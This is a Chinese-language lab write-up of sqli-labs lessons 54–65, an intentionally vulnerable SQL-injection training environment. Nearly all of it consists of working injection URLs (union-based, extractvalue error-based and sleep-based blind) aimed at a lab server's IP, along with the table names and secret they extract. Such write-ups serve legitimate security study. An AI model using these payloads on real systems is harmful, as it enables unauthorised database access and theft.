sqli_labs學習筆記（一）Less-54~Less-65

續上，開門見山

---

 

暴庫：

http://43.247.91.228:84/Less-54/?id=-1' union select 1,2,database() --+

 

challenges

 

爆表：

http://43.247.91.228:84/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

VYKE8MDNKB

 

暴列：

http://43.247.91.228:84/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='VYKE8MDNKB' --+

 

猜想secret_SXUW 是key

 

暴值：

http://43.247.91.228:84/Less-54/?id=-1' union select 1,2,group_concat(secret_SXUW) from challenges.VYKE8MDNKB --+

 

---

 

思路同上54 ,只不過多一個括號?id=0) 次數爲14次

 

 

爆表：

http://43.247.91.228:84/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

VYKE8MDNKB

 

暴列：

http://43.247.91.228:84/Less-55/?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='VYKE8MDNKB' --+

 

secret_SXUW

 

暴值：

http://43.247.91.228:84/Less-55/?id=-1) union select 1,2,group_concat(secret_SXUW) from VYKE8MDNKB --+

 

---

 

思路同上54，55。只不過多一個單引號和括號?id=0’) 次數爲14次

 

 

---

 

思路同上，只不過 id=」.$id.」 這裏進行了雙引號閉合 

 

---

 

執行sql 語句後，並無返回數據庫當中的數據，因此咱們這裏不能使用 union 聯合注入，這裏使用報錯注入。

 

爆表：

http://43.247.91.228:84/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

 

EZ6LZXJARY

 

暴列：

http://43.247.91.228:84/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='EZ6LZXJARY'))) --+

 

secret_B91Y

 

 

 

暴值：

http://43.247.91.228:84/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_B91Y) from EZ6LZXJARY))) --+

 

s4zRNgMzckNdj5E91NqvgYZx

 

---

 

同58，只不過沒有單引號 

 

---

 

 

同59，只不過多了雙引號和括號?id=0」) 

 

---

 

同上，只不過多了兩個括號和一個雙引號?id=0’)) 

 

---

 

此處union和報錯注入都已經失效了，那咱們就要使用延時注入了。

 

?id=1’)and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),1,1))=79,0,sleep(10))–+

 

當正確的時候時間很短，當錯誤的時候時間大於 10 秒，此時能夠利用腳本進行嘗試。前面報錯型盲注部分有完整代碼

 

---

 

同上62,只不過是單引號

payload:?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))–+

正確時間短，錯誤時間長

 

---

 

同上63,只不過是雙括號

payload:?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))–+

正確時間短，錯誤時間長

 

---

 

同上，只不過?id=1」)

payload:?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+

 

---

 

　　感謝看雪提供的學習平臺

sqli_labs完